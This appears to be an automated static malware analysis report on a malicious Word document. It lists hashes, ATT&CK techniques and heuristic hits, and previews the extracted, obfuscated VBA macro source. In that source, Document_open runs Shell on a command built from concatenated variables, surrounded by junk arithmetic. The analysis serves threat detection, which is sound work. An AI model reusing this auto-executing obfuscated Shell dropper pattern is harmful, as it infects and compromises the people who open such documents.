Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1395118214a02772…

MALICIOUS

Office (OLE)

263.5 KB Created: 2018-07-18 07:45:00 Authoring application: Microsoft Office Word First seen: 2019-11-20
MD5: b1b5fa309a0327bd269dceb2c33da04a SHA-1: 6eea14357e616454a8c626205d10a7fa5a513e7f SHA-256: 1395118214a02772cfd4562a0731397c9021fe1ea3e193844d9066fbf549887c
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a Microsoft Office document containing VBA macros. The critical heuristic firing indicates a Shell() call within the Document_Open macro, which is a common technique for executing arbitrary commands. The macro's obfuscated nature and the presence of the Shell() call strongly suggest it's designed to download and execute a secondary payload.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 65309 bytes
SHA-256: 3215b001258a1a0fe6c2218233d9983b30fed247a9fab808169b38a3a0f46282
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "oizMYZcvn"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function antSFptqTR()
On Error Resume Next
   zObqmj = 51459 + hawLtW - (EwjdOW + RjVEB)
   uViiYh = 30095 + zqjkz - (ANYwm + SslUOT)
   soEhqi = 99070 + nWrCuc - (tAClAh + nRqCiB)
   PPwzo = 97954 + jtVpJ - (qSrZmv + KNPjvo)
   UErjd = 20653 + CtPKXZ - (GjzqE + TLhpBu)
   REzUJ = 73136 + uwWEPk - (wnkkn + KiLLQc)
End Function
Private Function YJUoLMTalSB()
On Error Resume Next
   vdpIVL = 80807 + uvdPVi - (vUfYs + pBdzzq)
   cMIXV = 39208 + HwhwG - (FLJVwH + ofiYqD)
   isBhW = 84002 + XCmHQp - (XNcAFS + viwbwR)
   HMILjP = 85892 + trZTf - (advRYq + RquZkT)
   khRWzZ = 11511 + QkpUoG - (prEvIU + qwfZnK)
   mwvQP = 95355 + jLKck - (BVubG + XzEEuj)
End Function
Private Function nDzsZCmKOwiHw()
On Error Resume Next
   YjsZk = 40251 + LzsWQ - (kiPAzf + PIkPUH)
   zcFch = 99595 + XOzim - (MTcqF + DGwCbk)
   NQwEjl = 33795 + TSfrG - (fXPPk + KdkqO)
   pJYlK = 12582 + ozsuI - (BijJz + GMMfz)
   JcdYl = 81519 + VwXIZG - (ClMtW + XwMjUF)
End Function
Private Sub Document_open()
On Error Resume Next
   zcEIF = 13634 + AOwoBj + Ufhpzq / zTFlSZ - 21657 + VdJXW - (16835 + FkfWcT + ftwOY * kdADj)
   AjqrU = 57575 + uZqEu + vaQCJ / dKILI - 12132 + KNTSPL - (77400 + KWLaG + vzOYPv * wdonm)
   wHTnl = 65922 + ThBqYp + iTUkQ / CwadwR - 8354 + YILli - (37045 + DCSaK + soPUp * uEFpva)
Shell "" + zXnhQwsT + NppazJbORqo + CVar("c") + EBzRrcGoHKWG + pLVQLOVAjYJjr + ausuu + ablhHbTij + OQYTX + IiIjMRzzpPN + RncdnQsTU + LzUiwLpjEA + jiDrGwZ + bnTHfjG + WvzfOm + WodqNMEtbA + VSNajFFsFuo + fibUiBGk + ODDEJMrZ + bbsizFa + NXkrI + DFjWok + cjHdkcb + iNWCcOGK + qfhiDLv + azHHiOTq + SSvROpzWK + jzIFacD + sLwtpjXNi + mUmdiFCqR + UWjqnNcokk + rViljTAb + tGVlDFbDZiM, 0
   mwJwU = 88872 + zzUSnO + EdbhA / JMuXH - 46694 + hrFNu - (38651 + UIHzG + Ehiwj * YQIJOD)
   sLbLjf = 60656 + rbtSBd + XMuWIw / ooMZj - 21662 + uivwjq - (50295 + HQvaz + ibSCb * fNnpko)
   NaElo = 92306 + QFsHXS + uwWbb / PbivoS - 109 + ZhqJGS - (80239 + DVKKMo + lqLWMV * mnbrl)
End Sub
Private Function nKzLQLwDpVIjw()
On Error Resume Next
   rPfNHf = (FSzsq / zpkfTM + 66598 / 46772) / (97983 / ShpSuM * (KrzRNz + 43782))
   mtCbo = 10787 + radwm + jMtdb / OaDAQS - 5052 + TTzqYV - (90064 + krYolW + YhUYv * dbiIU)
   itmJmY = 95411 + cnXQH + bCEmss / iSvtG - 19848 + sThETP - (7146 + EPCNYv + uwHocB * ZVbJX)
   UbWwYr = (bhUji / VWJTz + 8091 / 47824) / (92499 / Yvuzru * (PnPZS + 44766))
   QnpiK = (lQbjkv / LVCsdN + 61686 / 34641) / (23454 / spmAq * (jpNjC + 91871))
End Function
Private Function zWvErYBz()
On Error Resume Next
   icCciv = 23925 + hawws + hXIXQ / qBNFU - 36770 + misCYX - (43753 + tIifr + tozMql * QrtvB)
   VAsBQ = 32440 + bzwEcw + RNvDiP / DCuXnO - 14737 + EktuVq - (40149 + lWKHJ + uEVaIn * dzPBTS)
   QKQBCi = 56403 + EupRz + GZKCHX / QkNmF - 22461 + rtJjC - (92353 + FNcJr + KERKKo * IqRaI)
   zZDPz = 37111 + UKlFP + bBLit / jsMTC - 53494 + lKAbj - (51897 + XRfKM + Xjpuj * vkwGf)
   dPwIL = 39165 + hoYXZW + oOdrZ / wMNtd - 65330 + VmzGX - (64137 + ddMWU + IMzbo * OQccP)
   rzjnGA = 76479 + hzUiBi + jKVBVh / ACSmzj - 61221 + DVrCjW - (81042 + ZJYfqj + LiZCD * liOAzz)
End Function
Private Function DHBuvwqzvW()
On Error Resume Next
   kiXGiK = 72828 + uwPpdE + EnrPu / bpEAHQ - 15459 + SjikwC - (74516 + qzmcil + JGABAt * HPdwI)
   wrwBCT = 63918 + IXicw + rdCkX / IFGRi - 92387 + XUfdfM - (16247 + mRwwfw + LfcZv * GMzLzi)
   TdWFh = 89137 + zbIcW + XiTXh / StlQf - 49385 + KivSb - (35617 + XDPbib + NDuqz * OqFsNk)
   TiNqf = 29371 + kCJjJm + TSroFj / pqajj - 7287 + ZDFro - (58547 + VClCM + dBlJpG * XmBYiu)
   Gatdu = 53461 + hFiCZ + wtcRLq / vtHPH - 78876 + YSHCtw - (14225 + WtwoJL + AVwbPb * nLkRi)
End Function
Private Function DvjGnMS()
On Error Resume Next
   wGSrlK = (tsWEwC / vBhdCH + 47715 / 47184) / (78363 / sDdiz * (iGPHtc + 
... (truncated)